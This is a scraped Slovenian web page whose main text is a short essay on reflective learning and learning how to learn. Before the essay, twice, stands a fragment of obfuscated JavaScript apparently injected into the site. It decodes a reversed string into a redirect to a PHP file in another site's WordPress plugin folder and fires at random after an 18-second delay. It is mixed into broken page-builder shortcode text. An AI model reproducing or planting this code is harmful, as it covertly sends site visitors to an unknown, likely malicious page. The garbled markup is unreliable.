Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Reflektivno učenje


Reflektivno učenje pomeni, da v naučeno vnesemo svoje razmišljanje. Da se o tem pogovarjamo in izrazimo svojo perspektivo, ne zgolj ponavljamo perspektivo tistega, od katerega oz. iz česar smo se učili.

Reflektivno učenje je možno le z lastnim raziskovanjem. Z njim dobimo informacije iz več virov in tako nismo odvisni od zgolj enega (učitelja ali učbenika). Posledica reflektivnega učenja je kritično mišljenje, s katerim se lahko upremo manipulacijam, ki so redni spremljevalec družbenega, še posebej pa informacijskega razvoja.

Refleksija na najvišji stopnji vodi do najvišjega cilja v učenju: naučiti se, kako se učiti. Ko to znamo, nam je veliko lažje premagovati ovire v življenju, ker se ne bojimo učiti novih stvari. Sposobnost učenja bo še posebej pomembna v prihodnosti, ko bodo poklici veliko bolj dinamični.

Kako se naučiti učiti? Najbolj splošni način, ki pride prav za vsako učenje, je razmišljanje o svojem učenju. Z določanjem tega, kar že znamo, in tega, česar še ne znamo (da bi npr. rešili nek problem), lahko spoznamo, kako se učimo oz. česa se lažje in prej naučimo in česa težje in kasneje. Skladno s tem se je priporočljivo lotiti učenja tistega dela, ki smo ga do sedaj zapostavljali ali odrivali.

To je torjev Spreten.si.